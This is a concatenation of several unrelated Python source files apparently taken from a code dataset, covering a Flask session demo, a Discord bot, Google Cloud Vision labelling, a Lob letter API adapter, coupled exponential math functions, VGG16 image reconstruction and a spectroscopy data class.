getEndpointDowntimes(self):\n return self.endpointdowntimes\n\n\n # --------------------------------------------------------------------------\n\n def is_in_downtime(self, seconds):\n \"\"\"\n checks if there at least one downtime event \n for this DDM a given number of seconds in the future.\n We do it by checking if we are alrady affected by an\n extended TimeInterval for any of the Downtime events registered.\n :param int seconds: how many seconds to look into the future\n :return bool:\n \"\"\"\n self.log.info('Checking if DDM %s is affected by downtime.' %self.endpoint)\n for downtime in self.endpointdowntimes.getlist():\n timeinterval = downtime.timeinterval\n extended_timeinterval = timeinterval.extend(seconds)\n #if extended_timeinterval.belongs():\n # return True\n if int(time.time()) in extended_timeinterval:\n return True\n\n else:\n self.log.info('DDM %s is not affected by downtime. Returning False.' %self.endpoint)\n return False\n\n\n# =============================================================================\n\nclass DDMHandler(AGISDDMHandler):\n\n\n def getOverlapDowntimesList(self):\n \"\"\"\n to get if all DDMs will be in downtime at the same time.\n It returns a OverlapDowntimesList, so the output has the same \n shape that the one returned by CEHandler.\n :return OverlapDowntimesList:\n \"\"\"\n # Currently, there is only one DDM per DDMHandler,\n # therefore, we convert each Downtime to a \n # OverlapDowntimes, because we know there are no\n # more than one Downtimes (overlapping or not), \n # because there are no more than one DDM\n\n overlapdowntimeslist = OverlapDowntimesList()\n for ddm in self.getlist():\n downtime_l = ddm.getEndpointDowntimes()\n for downtime in downtime_l.getlist():\n # we make a collection from each Downtime\n overlapdowntimes = OverlapDowntimes()\n overlapdowntimes.add(downtime)\n # we add the collection to the list of collections\n overlapdowntimeslist.add(overlapdowntimes)\n return overlapdowntimeslist\n\n \n\n\n\n","sub_path":"switcher/topology/ddm.py","file_name":"ddm.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109379025","text":"#! usr/bin/env python3\n\"\"\"\n Module 1 Task 2\n This app will test the minivan.py file\n\"\"\"\n\nfrom __future__ import print_function\nfrom urllib.request import urlopen\nimport sys\nfrom minivan import doors_lockers\n\ndef testMinivan():\n \"\"\"\n This function will test the minivan doors which they are open or not using getFile variable.\n It will open the file from the web.\n It will call doors_lockers function from minivan.py\n \"\"\"\n # Assign the csv file from the web to getFile veriable.\n getFile = \"http://icarus.cs.weber.edu/~hvalle/cs3030/data/minivanTest.csv\"\n # open the csv file \n with urlopen(getFile) as testFile:\n # Declare and Store the output in a record list.\n record = []\n # Loop over each line in the testFile\n for line in testFile:\n # Decode the line and replace spaces, strip them and split them with comma.\n lineRows = line.decode('utf-8').replace(\" \", \"\").strip().split(\",\")\n # Add what is in lineRows variable to record list\n record.append(lineRows)\n # Start the counter \n counter = 0\n # Loop over each element in the record list\n for el in record:\n # Check if the counter is greater than 0\n if counter > 0:\n # Print record list.\n print(\"Reading Record {0}:\".format(counter))\n # Call doors_lockers function from minivan.py and assign each el to the corrsponding variable..\n doors_lockers(el)\n # Pring an empty line.\n print()\n # Increase the counter by 1\n counter += 1\n\ndef main():\n \"\"\"\n Run the app and invoke testMinivan function\n \"\"\"\n # Call testing function\n testMinivan()\n \nif __name__ == \"__main__\":\n main()\n exit(0)\n","sub_path":"minivantest.py","file_name":"minivantest.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"93501268","text":"import pytest\n\nfrom custom_components.hacs.validate.common.repository_description import (\n RepositoryDescription,\n)\nfrom tests.dummy_repository import dummy_repository_base\n\n\n@pytest.mark.asyncio\nasync def test_repository_no_description():\n repository = dummy_repository_base()\n repository.data.description = \"\"\n check = RepositoryDescription(repository)\n await check._async_run_check()\n assert check.failed\n\n\n@pytest.mark.asyncio\nasync def test_repository_hacs_description():\n repository = dummy_repository_base()\n check = RepositoryDescription(repository)\n await check._async_run_check()\n assert not check.failed\n","sub_path":"tests/validate/common/test_repository_description_check.py","file_name":"test_repository_description_check.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62464416","text":"from datetime import timedelta\nfrom flask import Flask, session\nimport os\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = os.urandom(24)\napp.config['PERMANENT_SESSION_LIFETIME'] = timedelta(days=7) #将session改为7天\n@app.route('/')\ndef hello_world():\n session['username'] = 'zhiliao'\n #没有设置过期时间,那么默认是浏览器关闭后\n #如果设置permanent属性为True则一个月后消失\n session.permanent = True\n return 'Hello World!'\n\n@app.route('/get/')\ndef get():\n return session.get('username', 'hah')\n\n@app.route('/delete/')\ndef delete():\n # session.pop('username', '')\n session.clear()\n print(session.get('username', '猪头肉'))\n return 'success'\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flask/Day06Session/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636168281","text":"import io\nimport os\nimport pickle\nimport webbrowser\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"S:\\\\Internet Sales Office\\\\Web\\\\credentials\\\\google-cloud-vision\\\\mr-s-image-project-8827e477db4a.json\"\n\n# Imports the Google Cloud client library\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\n# Labels\ndef detect_labels_uri(uri):\n \"\"\"Detects labels in the file located in Google Cloud Storage or on the\n Web.\"\"\"\n client = vision.ImageAnnotatorClient()\n image = types.Image()\n image.source.image_uri = uri\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n # print('Labels:')\n\n # for label in labels:\n # print(label.description)\n\n return labels\n\n# Safe Search\n\ndef detect_safe_search_uri(uri):\n \"\"\"Detects unsafe features in the file located in Google Cloud Storage or\n on the Web.\"\"\"\n client = vision.ImageAnnotatorClient()\n image = vision.types.Image()\n image.source.image_uri = uri\n\n response = client.safe_search_detection(image=image)\n safe = response.safe_search_annotation\n\n # Names of likelihood from google.cloud.vision.enums\n # likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\n # 'LIKELY', 'VERY_LIKELY')\n # print('Safe search:')\n\n # print('adult: {}'.format(likelihood_name[safe.adult]))\n # print('medical: {}'.format(likelihood_name[safe.medical]))\n # print('spoofed: {}'.format(likelihood_name[safe.spoof]))\n # print('violence: {}'.format(likelihood_name[safe.violence]))\n # print('racy: {}'.format(likelihood_name[safe.racy]))\n\n return safe\n\n\nwith open('image_urls_gcv_processed.pickle', 'rb') as f:\n # The protocol version used is detected automatically, so we do not\n # have to specify it.\n image_urls = pickle.load(f)\n\n# print(\"Loaded image urls!\")\n# print(\"len(image_urls) = \" + str(len(image_urls)))\n# print()\n\n# Variables to report to console during processing:\nerror_urls = []\ncounter = 0\n\n\n# for image in image_urls[500:510]:\nfor image in image_urls:\n\n if len(image['labels']) == 0:\n\n counter += 1\n\n try:\n url = image['url']\n\n print(str(counter))\n print(url)\n\n labels = []\n for item in range(3):\n webbrowser.open_new(url)\n word = input(\"Input labels: \")\n score = .9\n label = { \"word\": word, \"score\": score }\n labels.append(label)\n\n image['labels'] = labels\n\n print(\"Fixed image \" + str(counter) + \" of 66\")\n print('-'*50)\n print()\n\n except:\n\n error_urls.append(image)\n\n print(\"============================================\")\n print(\"Skipped: \" + image['sku'] + '\\n' + image['url'])\n print(\"line: \" + str(sys.exc_info()[-1].tb_lineno) )\n print(err)\n print(\"============================================\")\n\nprint(\"Finished!\")\nprint()\n\n\n# WRITE data object to file (SERIALIZE)\nwith open('image_urls_gcv_processed_PLUS_66.pickle', 'wb') as f:\n # Pickle the 'data' dictionary using the highest protocol available.\n pickle.dump(image_urls, f, pickle.HIGHEST_PROTOCOL)\n\n \n# WRITE ERRORS list to file (SERIALIZE)\nwith open('error_urls.pickle', 'wb') as f:\n # Pickle the 'data' dictionary using the highest protocol available.\n pickle.dump(error_urls, f, pickle.HIGHEST_PROTOCOL)","sub_path":"image-analysis/1-images/2-get-google-cloud-vision-data/fix_66_labelless.py","file_name":"fix_66_labelless.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"131744424","text":"import lob\nimport sys\nimport webbrowser\nimport requests.exceptions\n\nlob.api_key = 'test_0dc8d51e0acffcb1880e0f19c79b2f5b0cc'\neasyStates = {}\n\ndef setUpStatesLookup():\n\tstates = lob.State.list()\n\tfor state in states[\"data\"]:\n\t easyStates[state[\"name\"].upper()] = state[\"short_name\"]\n\t easyStates[state[\"short_name\"]] = 0\n\ndef createLetter(toAddress, fromAddress):\n letter = lob.Letter.create(\n description = 'Coding Challenge Letter',\n to_address = {\n 'name': toAddress.name,\n 'address_line1': toAddress.address1,\n 'address_line2': toAddress.address2,\n 'address_city': toAddress.city,\n 'address_state': toAddress.state,\n 'address_zip': toAddress.zip,\n 'address_country': 'US'\n },\n from_address = {\n 'name': fromAddress.name,\n 'address_line1': fromAddress.address1,\n 'address_line2': fromAddress.address2,\n 'address_city': fromAddress.city,\n 'address_state': fromAddress.state,\n 'address_zip': fromAddress.zip,\n 'address_country': 'US'\n },\n file = '{{message}}',\n data = {\n 'message': fromAddress.msg\n },\n color = True)\n webbrowser.open(letter[\"url\"]) \n\ntry:\n\tsetUpStatesLookup()\nexcept requests.exceptions.RequestException as e:\n\tprint(\"Couldn't connect: {0}\".format(e.strerror))\n\tsys.exit(1) ","sub_path":"lob_adapter.py","file_name":"lob_adapter.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84445253","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\ndef coupled_logarithm(value: [int, float, np.ndarray],\n kappa: [int, float] = 0.0,\n dim: int = 1\n ) -> [float, np.ndarray]:\n \"\"\"\n Generalization of the logarithm function, which defines smooth\n transition to power functions.\n \n Parameters\n ----------\n value : Input variable in which the coupled logarithm is applied to.\n Accepts int, float, and np.ndarray data types.\n kappa : Coupling parameter which modifies the coupled logarithm function.\n Accepts int and float data types.\n dim : The dimension (or rank) of value. If value is scalar, then dim = 1.\n Accepts only int data type.\n \"\"\"\n # convert value into np.ndarray (if scalar) to keep consistency\n value = np.array(value) if isinstance(value, (int, float)) else value\n assert isinstance(value, np.ndarray), \"value must be an int, float, or np.ndarray.\"\n assert 0. not in value, \"value must not be or contain np.ndarray zero(s).\"\n if kappa == 0.:\n coupled_log_value = np.log(value) # divide by 0 if x == 0\n else:\n coupled_log_value = (1. / kappa) * (value**(kappa / (1. + dim*kappa)) - 1.)\n return coupled_log_value\n\n\ndef coupled_exponential(value: [int, float, np.ndarray],\n kappa: float = 0.0,\n dim: int = 1\n ) -> [float, np.ndarray]:\n \"\"\"\n Generalization of the exponential function.\n\n Parameters\n ----------\n value : [float, np.ndarray]\n Input values in which the coupled exponential is applied to.\n kappa : float,\n Coupling parameter which modifies the coupled exponential function. \n The default is 0.0.\n dim : int, optional\n The dimension of x, or rank if x is a tensor. The default is 1.\n\n Returns\n -------\n float\n The coupled exponential values.\n \n \"\"\"\n # convert number into np.ndarray to keep consistency\n value = np.array(value) if isinstance(value, (int, float)) else value\n assert isinstance(value, np.ndarray), \"value must be an int, float, or np.ndarray.\"\n # assert 0 not in value, \"value must not be or contain np.ndarray zero(s).\"\n assert isinstance(dim, int) and dim >= 0, \"dim must be an integer greater than or equal to 0.\"\n # check that -1/d <= kappa\n assert -1/dim <= kappa, \"kappa must be greater than or equal to -1/dim.\"\n\n if kappa == 0:\n coupled_exp_value = np.exp(value)\n elif kappa > 0: # KPN 4/13/21 adding logic for 1 + kappa*value <=0\n if (1 + kappa*value) > 0: \n return (1 + kappa*value)**((1 + dim*kappa)/kappa)\n else: # KPN 4/13/21 since kappa > 0 (1+dim*kappa)/kappa > 0\n return 0. \n \n # the following is given that kappa < 0\n else:\n def _compact_support(value, kappa, dim):\n if (1 + kappa*value) > 0: # KPN 4/13/21 removed equal sign; if = 0, then result is either 0 or inf\n try:\n return (1 + kappa*value)**((1 + dim*kappa)/kappa)\n except ZeroDivisionError: # KPN 4/13/21 ZeroDivisionError may no longer be necessary\n print(\"Skipped ZeroDivisionError at the following: \" + \\\n f\"value = {value}, kappa = {kappa}. Therefore,\" + \\\n f\"(1+kappa*value) = {(1+kappa*value)}\"\n )\n elif ((1 + dim*kappa)/kappa) > 0:\n return 0.\n else:\n return float('inf') \n compact_support = np.vectorize(_compact_support)\n coupled_exp_value = compact_support(value, kappa, dim)\n\n return coupled_exp_value\n","sub_path":"nsc_tf/math/.ipynb_checkpoints/function-checkpoint.py","file_name":"function-checkpoint.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106114149","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.path.insert(0, '../../')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport mut.viz\ncolors = mut.viz.color_selector('pboc')\nmut.viz.plotting_style()\n\n# Load the SBC statistics\nsbc_data = pd.read_csv('../../data/csv/IND_sbc.csv')\n\n# Reform the dataframe to only focus on Ka and Ki\ndf = pd.DataFrame([])\nfor g, d in sbc_data.groupby(['sim_idx', 'model']):\n ka = d[d['param']=='Ka'][['post_median', 'shrinkage']].values[0]\n ki = d[d['param']=='Ki'][['post_median', 'shrinkage']].values[0]\n df = df.append({'Ka_shrinkage':ka[1], 'Ki_shrinkage':ki[1], \n 'Ka_median':ka[0], 'Ki_median':ki[0], \n 'model':g[1], 'sim':g[0], 'idx':ka[1] <= ki[1]},\n ignore_index=True)\n\n# ##############################################################################\n# FIGURE INSTANTIATION\n# ##############################################################################\nfig, ax = plt.subplots(2, 1, figsize=(6, 3))\n\n# Define the axes\naxes = {'KaKi_only':ax[0], 'KaKi_epAI':ax[1]}\n\n# Adjust scaling and set labels\nfor a in ax.ravel():\n a.xaxis.set_tick_params(labelsize=6)\n a.yaxis.set_tick_params(labelsize=6)\n a.set_xlim([-1, 1.1])\n a.set_yscale('log')\n a.set_xlabel('shrinkage', fontsize=8)\n a.set_ylabel('$K_A$ [µM]', fontsize=8)\nax[0].set_title('$K_A$ and $K_I$ modified', fontsize=8)\nax[0].set_title(r'$K_A$, $K_I$, and $\\Delta\\varepsilon_{AI}$ modified', fontsize=8)\n\n# ##############################################################################\n# ECDFS\n# ##############################################################################\nfor g, d in df.groupby('model'):\n gt_s = d[d['idx']==0]['Ka_shrinkage'].values\n gt_v = d[d['idx']==0]['Ka_median'].values\n lt_s = d[d['idx']==1]['Ka_shrinkage'].values\n lt_v = d[d['idx']==1]['Ka_median'].values\n pool_s = d[d['idx']==1]['Ka_shrinkage'].values\n pool_v = d[d['idx']==1]['Ka_median'].values\n _ax = axes[g]\n _ax.plot(gt_s, gt_v, '.', color=colors['red'], \n label='$K_A > K_I$', alpha=0.5)\n _ax.plot(lt_s, lt_v, '.', color=colors['blue'], \n label='$K_A < K_I$', alpha=0.5)\n\nfor a in ax:\n a.legend(fontsize=8, ncol=2, loc='lower left')\nplt.tight_layout()","sub_path":"code/figures/FigSX_shrinkage_pathology.py","file_name":"FigSX_shrinkage_pathology.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10937787","text":"from asyncio import sleep\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport discord\nfrom PIL import Image\nfrom discord import Intents\nfrom discord.ext import commands\n\nfrom bot.config import bad_apple_bot_config\nfrom bot.utils import CLIP_FRAMES, CLIP_LENGTH, FRAME_LENGTH, frames_path, process_image\n\nPROCESS_POOL_SIZE = 5\nPROCESS_POOL = ProcessPoolExecutor(PROCESS_POOL_SIZE)\n\nbot = commands.AutoShardedBot(\n command_prefix=commands.when_mentioned_or(bad_apple_bot_config.prefix.value),\n description=\"Bot that sends bad apple video frames to you channel!\",\n intents=Intents.default()\n)\nbot.__version__ = \"1.0.0\"\n\n\n@bot.event\nasync def on_ready():\n print(\n \"Logged in as\",\n f\"Name: {bot.user.name}\",\n f\"DevID: {bot.user.id}\",\n f\"Discord.py {discord.__version__}\",\n f\"Bot version: {bot.__version__}\",\n \"Fork by @Rud356 (https://github.com/Rud356)\",\n \"Original bot by: @NPCat (https://github.com/NPCat)\",\n f\"default prefix: {bad_apple_bot_config.prefix.value}\",\n sep='\\n'\n )\n\n activity = discord.Activity(\n name=f\"My prefix is {bad_apple_bot_config.prefix.value}\",\n type=discord.ActivityType.watching\n )\n await bot.change_presence(activity=activity)\n\n\n@commands.cooldown(rate=1, per=CLIP_LENGTH, type=commands.BucketType.channel)\n@bot.command()\nasync def bad_apple(ctx: commands.Context):\n \"\"\"Plays bad apple video in text messages\"\"\"\n played_frames = 0\n for frame_index in range(0, CLIP_FRAMES, 4):\n frame_path = frames_path / f\"frame {frame_index}.png\"\n if not frame_path.is_file():\n continue\n\n try:\n frame = Image.open(frame_path)\n except Image.UnidentifiedImageError:\n continue\n\n converted_frame = await bot.loop.run_in_executor(\n PROCESS_POOL, process_image, frame\n )\n\n await ctx.send(content=converted_frame)\n played_frames += 1\n await sleep(FRAME_LENGTH)\n\n await ctx.send(content=\"Done!\")\n","sub_path":"bot/bad_apple.py","file_name":"bad_apple.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"349987323","text":"from scipy.misc import imsave, imshow\nimport numpy as np\nfrom keras.applications import vgg16\nfrom keras import backend as K\nfrom keras.preprocessing import image\nfrom utils import *\nfrom scipy.optimize import fmin_l_bfgs_b\n\n# dimensions of the generated pictures for each filter.\nimg_width, img_height = 128, 128\n\nshow_pictures = 1\n\n# Optimization algo\n# Turn BFGS to 0 for using gradient descent algo \nBFGS = 1\n# Parameters of BFGS \nbfgs_iter = 10\n# Parameters of the gradient descent\ngdsc_step = 0.00001\ngdsc_iter = 50\n\n############### Model build ###############################\n# build the VGG19 network with ImageNet weights, no fully connected layers\nmodel = vgg16.VGG16(weights='imagenet', include_top=False)\nmodel.summary()\noutputs_dict = dict([layer.name, layer.output] for layer in model.layers)\n\n# Content Image\nimg = image.load_img('contents/content.jpg', target_size=(img_width, img_height))\nif (show_pictures == 1):\n imshow(img)\nimsave(\"original_content.png\", img)\ncontent_img = preprocess_image(img)\n\n\n############### Response from Content image ###############################\n\ncontent_layers = ['block1_conv1', 'block1_conv2']\ncontent_layers += ['block2_conv1', 'block2_conv2']\ncontent_layers += ['block3_conv1', 'block3_conv2', 'block3_conv3', 'block3_conv4']\ncontent_layers += ['block4_conv1', 'block4_conv2', 'block4_conv3', 'block4_conv4']\ncontent_layers += ['block5_conv1', 'block5_conv2', 'block5_conv3', 'block5_conv4']\n\nfor layer_name in content_layers:\n get_response = K.function([model.input], [outputs_dict[layer_name]])\n content_feature = K.constant(get_response([content_img])[0])\n\n # Gradients and loss \n layer_output = outputs_dict[layer_name][0]\n loss = K.sum(K.square(content_feature - layer_output))\n grads = K.gradients(loss, model.input)[0]\n func_loss = K.function([model.input], [loss])\n func_grads = K.function([model.input], [grads])\n\n # we start from a white noise image with some random noise\n gray_img = np.random.random((1, img_width, img_height, 3)) # Channel Last\n\n if BFGS == 1:\n # Gradients for white noise image using min_l_bfgs_b \n def fn_loss (x):\n x = x.reshape((1, img_width, img_height, 3))\n l = func_loss([x])[0]\n return l.flatten().astype('float64')\n \n def fn_grads (x):\n x = x.reshape((1, img_width, img_height, 3))\n g = func_grads([x])[0]\n return g.flatten().astype('float64')\n \n \n for i in range (0, bfgs_iter):\n print ('iteration ',i)\n gray_img, min_val, info = fmin_l_bfgs_b(fn_loss, gray_img, fn_grads, maxfun=20)\n print('Current loss value:', min_val.sum())\n \n rec_img = gray_img.reshape((img_width, img_height, 3))\n bfgs='bfgs_'\n\n else: \n # Gradient descent \n for i in range (gdsc_iter):\n loss_value = func_loss([gray_img])[0]\n grads_value = func_grads([gray_img])[0]\n gray_img -= grads_value * gdsc_step\n print('[', layer_name, ']', 'Iter', i, ': Current loss value =', loss_value.sum())\n rec_img = gray_img[0]\n bfgs=''\n\n # decode the resulting input image\n reconstructed_img = deprocess_image(rec_img)\n if (show_pictures == 1):\n imshow(reconstructed_img)\n img_name = 'img_reconst_'+bfgs+layer_name+'.png'\nimsave(img_name, reconstructed_img)","sub_path":"img_reconst_BFGS.py","file_name":"img_reconst_BFGS.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"278138698","text":"#!/usr/bin/python\nimport glob\nimport os\nimport tarfile\nimport urllib.request\ncur_path=os.path.dirname(os.path.abspath('labb3.py'))\nbool_untar=os.path.isdir('BSR')\nbool_tar=os.path.isfile('BSR_bsds500.tgz')\nif ( bool_tar==True and bool_untar==False ):\n\ttar=tarfile.open(\"BSR_bsds500.tgz\")\n\ttar.extractall()\n\ttar.close()\nelif ( bool_tar==False and bool_untar==False ):\n\turl='http://www.eecs.berkeley.edu/Research/Projects/CS/vision/grouping/BSR/BSR_bsds500.tgz'\n\tresponse=urllib.request.urlopen(url)\n\turllib.request.urlretrieve(url,'BSR_bsds500.tgz')\n\ttar = tarfile.open(\"BSR_bsds500.tgz\")\n\ttar.extractall()\n\ttar.close()\nelse:\n\tpass\n\nfrom PIL import Image\nimport os, os.path\ntotal_path = cur_path+'/BSR/BSDS500/data/images/train/'\na = os.listdir(total_path)\n\nfrom random import randint\nN = randint(6,15)\n\nimport numpy as np \na_array = np.asarray(a)\n\nim_selecc = [randint(0,200) for x in range(0,N)]\nnombres_ima = a_array[im_selecc]\n\nimport cv2\nimport numpy as npinstal\nfrom PIL import Image\n\nDireccion = [None]*N\nkeys = [None]*N\ndirectory = 'Imagenes_selecc/'\nfolder = total_path+directory\nif not os.path.exists(folder):\n\tos.makedirs(folder)\n\nfor i in range(N):\n\tDireccion[i] = total_path+nombres_ima[i]\n\tim =(Image.fromarray(cv2.imread(Direccion[i]))).resize((256,256))\n\tim.save(folder+nombres_ima[i],'JPEG')\n\nDictionary = {key:[] for key in nombres_ima}\nprint(Dictionary)\n\n\n\n\n","sub_path":"03-python/labb3.py","file_name":"labb3.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643435147","text":"from torch.utils.data import IterableDataset\nimport bz2, yaml\nfrom yaml import Loader\n\nclass CustomIterableDataset(IterableDataset):\n\n def __init__(self, filename):\n\n #Store the filename in object's memory\n self.filename = filename\n\n #And that's it, we no longer need to store the contents in the memory\n\n def preprocess(self, text):\n\n ### Do something with text here\n text_pp = text.lower().strip()\n ###\n\n return text_pp\n\n def line_mapper(self, line):\n\n #Splits the line into text and label and applies preprocessing to the text\n\n try:\n data = yaml.load(line, Loader=Loader)\n except:\n return ('','','',0)\n\n if data['author'] == 'AutoModerator':\n return ('', '', '', 0)\n\n text = data['body']\n subreddit = data['subreddit']\n subreddit_id = data['subreddit_id']\n text = self.preprocess(text)\n label = 0\n\n# print((text, subreddit, subreddit_id, label))\n\n return (text, subreddit, subreddit_id, label)\n\n\n def __iter__(self):\n\n #Create an iterator\n file_itr = open(self.filename)\n\n #Map each element using the line_mapper\n mapped_itr = map(self.line_mapper, file_itr)\n\n return mapped_itr\n","sub_path":"log_regression/CustomIterableDataset.py","file_name":"CustomIterableDataset.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"93338862","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"DataGroup1D: work with 1D data sets (scans)\n\nTODO\n----\n- [] REFACTOR THE WHOLE THING!!!\n- [] MOVE TECHNIQUE-BASED DATAGROUPS TO \"sloth.technique\"!!!\n- [] mksum\n- [] plotxy: self.pw.setGeometry(700, 50, 900, 900), use config!\n- []\n\n\"\"\"\n### IMPORTS ###\nimport os, sys\nimport numpy as np\nfrom datetime import datetime\n\n# Larch\nHAS_LARCH = False\ntry:\n from larch import use_plugin_path, Group\n # Larch Plugins\n use_plugin_path('io')\n from columnfile import _read_ascii\n use_plugin_path('wx')\n from plotter import _plot, _scatterplot, _plot_text\n use_plugin_path('math')\n from mathutils import _interp\n from fitpeak import fit_peak\n use_plugin_path('xafs')\n from xafsft import xftf, xftr, xftf_prep, xftf_fast, xftr_fast, ftwindow\n from pre_edge import pre_edge\n HAS_LARCH = True\nexcept ImportError:\n pass\n \nfrom ..io.specfile_reader import _str2rng as str2rng\nfrom ..io.specfile_reader import spec_getmap2group, spec_getmrg2group\nfrom ..rixs.rixsdata_plotter import RixsDataPlotter\nfrom .datagroup import DataGroup, _norm\n\n# PyMca\nHAS_PYMCA = False\ntry:\n from PyMca5.PyMcaGui import ScanWindow\n HAS_PYMCA = True\nexcept ImportError:\n try:\n from PyMca import ScanWindow\n HAS_PYMCA = True\n except ImportError:\n pass\n\n# DEBUG\nif 'DEBUG' in globals():\n pass\nelse:\n DEBUG = False\n\nclass DataGroup1D(DataGroup):\n \"\"\"1D version of DataGroup\"\"\"\n \n def __init__(self, kwsd=None, _larch=None):\n super(DataGroup1D, self).__init__(kwsd=kwsd, _larch=_larch)\n\n def read_ascii(self, fname, labels=None, sort=False, sort_column=0):\n \"\"\"see 'read_ascii' in Larch\"\"\"\n return _read_ascii(fname, labels=labels,\n sort=sort, sort_column=sort_column,\n _larch=self._larch)\n\n def write_ascii_xy(self, fname, g, xattr='x', yattr='y', label=None):\n \"\"\"write a two-columns ascii file to fname using xattr and yattr of a\ngiven group\n\n \"\"\"\n from larch_plugins.io import write_ascii\n _x = getattr(self.gs[g], xattr)\n _y = getattr(self.gs[g], yattr)\n if label is None:\n try:\n _lab = self.gs[g].label\n except:\n _lab = 'Unknown'\n return write_ascii(fname, _x, _y, label=_lab, _larch=self._larch)\n \n\n def getxy(self, fname, xattr='x', yattr='y', scanlab=None, **kws):\n \"\"\"load two colums ascii data \"\"\"\n g = _read_ascii(fname, labels='{0} {1}'.format(xattr, yattr),\n _larch=self._larch)\n g.norint = self.norint(getattr(g, yattr))#, x=getattr(g, xattr))\n g.normax = self.normax(getattr(g, yattr))\n g.label = str(scanlab)\n return g\n\n def getspecscan(self, fname, scans, scanlab=None, **kws):\n \"\"\"load two colums data from SPEC file\"\"\"\n cntx = kws.get('cntx', self.kwsd['spec']['cntx'])\n cnty = kws.get('cnty', self.kwsd['spec']['cnty'])\n csig = kws.get('csig', self.kwsd['spec']['csig'])\n cmon = kws.get('cmon', self.kwsd['spec']['cmon'])\n csec = kws.get('csec', self.kwsd['spec']['csec'])\n norm = kws.get('norm', self.kwsd['spec']['norm'])\n action = kws.get('action', self.kwsd['spec']['action'])\n g = spec_getmrg2group(fname,\n scans=scans,\n cntx=cntx,\n csig=csig,\n cmon=cmon,\n csec=csec,\n norm=norm,\n action=action,\n _larch=self._larch)\n g.label = str(scanlab)\n return g\n\n def getcom(self, g, xattr='x', yattr='y'):\n \"\"\"center of mass (com) for the given group and x,w attributes\"\"\"\n return np.average(getattr(self.gs[g], xattr), weights=getattr(self.gs[g], yattr))\n\n def norint(self, y, x=None):\n \"\"\"simple normalization by area\"\"\"\n return _norm(y, norm=\"area\", x=x)\n \n def normax(self, y):\n \"\"\"simple normalization by maximum minus offset\"\"\"\n return _norm(y, norm=\"max-min\")\n\n def norxafs(self, g, xattr='x', yattr='y', outattr=None, **kws):\n \"\"\"XAFS normalization on a given group (g)\n\n Keyword arguments\n -----------------\n xattr : ['x'] attribute for the energy array\n yattr : ['y'] attribute for the mu array\n outattr : ['flat'] attribute for output normalize array\n \n **kws : [''self.kwsd[pre_edge][*]''] as in pre_edge()\n \"\"\"\n e0 = kws.get('e0', self.kwsd['pre_edge']['e0'])\n pre1 = kws.get('pre1', self.kwsd['pre_edge']['pre1'])\n pre2 = kws.get('pre2', self.kwsd['pre_edge']['pre2'])\n norm1 = kws.get('norm1', self.kwsd['pre_edge']['norm1'])\n norm2 = kws.get('norm2', self.kwsd['pre_edge']['norm2'])\n nvict = kws.get('nvict', self.kwsd['pre_edge']['nvict'])\n nnorm = kws.get('nnorm', self.kwsd['pre_edge']['nnorm'])\n pre_edge(getattr(g, xattr), getattr(g, yattr), group=g,\n nnorm=nnorm, nvict=nvict, pre1=pre1, pre2=pre2,\n norm1=norm1, norm2=norm2, _larch=self._larch)\n if outattr == 'flat':\n return g.flat\n elif outattr == 'norm':\n return g.norm\n\n def xcalib(self, g, ref=0, method='com', set_attr=False):\n \"\"\"find the x-shift to calibrate two spectra\n\n Keyword arguments\n -----------------\n g : spectrum to shift (index in datagroup)\n ref : reference spectrum (in datagroup)\n method : the method to perform this task\n 'com' -> overlap the center of mass\n set_attr : [False] write 'xcalib' attr for the calibrated group\n\n \"\"\"\n if method == 'com':\n xmin = max(min(self.gs[g].x), min(self.gs[ref].x))\n xmax = min(max(self.gs[g].x), max(self.gs[ref].x))\n self.mkinterpxy(xmin=xmin, xmax=xmax)\n cmdiff = self.getcom(ref, xattr='xnew', yattr='ynew') - self.getcom(g, xattr='xnew', yattr='ynew')\n self.gs[g].x = self.gs[g].x + cmdiff\n print('{0}.x shifted by {1}'.format(self.gs[g].label, cmdiff))\n if set_attr:\n self.gs[g].xcalib = cmdiff\n else:\n pass\n\n def xshift(self, g, xshift, xattr='x'):\n \"\"\"simply apply the shift to group g\"\"\"\n _x = getattr(self.gs[g], xattr)\n setattr(self.gs[g], xattr, _x + xshift)\n\n def mkinterpxy(self, ref=0, sel='*', **kws):\n \"\"\"interpolate (xattr, yattr) to (xnew, 